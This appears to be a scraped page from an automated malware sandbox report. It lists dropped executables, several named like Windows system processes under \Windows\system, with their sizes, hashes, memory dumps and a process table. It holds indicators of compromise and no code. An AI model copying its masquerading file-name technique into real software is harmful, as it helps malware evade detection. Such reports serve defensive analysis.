\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\Temp\tzelrk.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
\Users\Admin\AppData\Local\Temp\tzelrk.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
\Windows\system\explorer.exe

Filesize
206KB

MD5
5f4ff718615c3a84eacd35082e7821c0

SHA1
6e273f1501c30190eaf472a3bd6a3f3264c90484

SHA256
eecada653f928f742e7e1bbdfe5f3dae2cddd8cc3cc288018a98d0fca83cc56b

SHA512
6d45ff52333b79070bc069627a3dfa69f17d356b25cc6c4c43ad307d969d80b0e9becfba3389c010f3b46e5dbd6dffa10820be132fa2620c8e136c017849691d

Download Submit
\Windows\system\explorer.exe

Filesize
206KB

MD5
5f4ff718615c3a84eacd35082e7821c0

SHA1
6e273f1501c30190eaf472a3bd6a3f3264c90484

SHA256
eecada653f928f742e7e1bbdfe5f3dae2cddd8cc3cc288018a98d0fca83cc56b

SHA512
6d45ff52333b79070bc069627a3dfa69f17d356b25cc6c4c43ad307d969d80b0e9becfba3389c010f3b46e5dbd6dffa10820be132fa2620c8e136c017849691d

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
\Windows\system\svchost.exe

Filesize
206KB

MD5
17d20e1197d46585085b1921608b0572

SHA1
ac6a10a719b084a33b56f228dcaba614f7ba5199

SHA256
c52aab64934f51001d6bb099174dd5cafe63d39841b8706c7766d4abf50fe8bc

SHA512
9f0c040c254328342198aaf6ac42e944bb6b9cba3127ad6008b70de84c47165af31c3ab7850613ab29558a9f4351ea86813933c2bb284e0fc95b82361d61cdba

Download Submit
\Windows\system\svchost.exe

Filesize
206KB

MD5
17d20e1197d46585085b1921608b0572

SHA1
ac6a10a719b084a33b56f228dcaba614f7ba5199

SHA256
c52aab64934f51001d6bb099174dd5cafe63d39841b8706c7766d4abf50fe8bc

SHA512
9f0c040c254328342198aaf6ac42e944bb6b9cba3127ad6008b70de84c47165af31c3ab7850613ab29558a9f4351ea86813933c2bb284e0fc95b82361d61cdba

Download Submit
memory/276-176-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1340-66-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1340-67-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1340-184-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1340-183-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1340-103-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1340-99-0x00000000037B0000-0x00000000037F0000-memory.dmp

Filesize
256KB

Download
memory/1692-180-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1692-186-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1708-179-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1708-185-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1816-173-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1936-178-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2016-177-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2016-104-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download

pid	process
2016	TZELRK.exe
1660	tzelrk.exe
1936	icsys.icn.exe
1708	explorer.exe
276	spoolsv.exe
1692	svchost.exe
1816	spoolsv.exe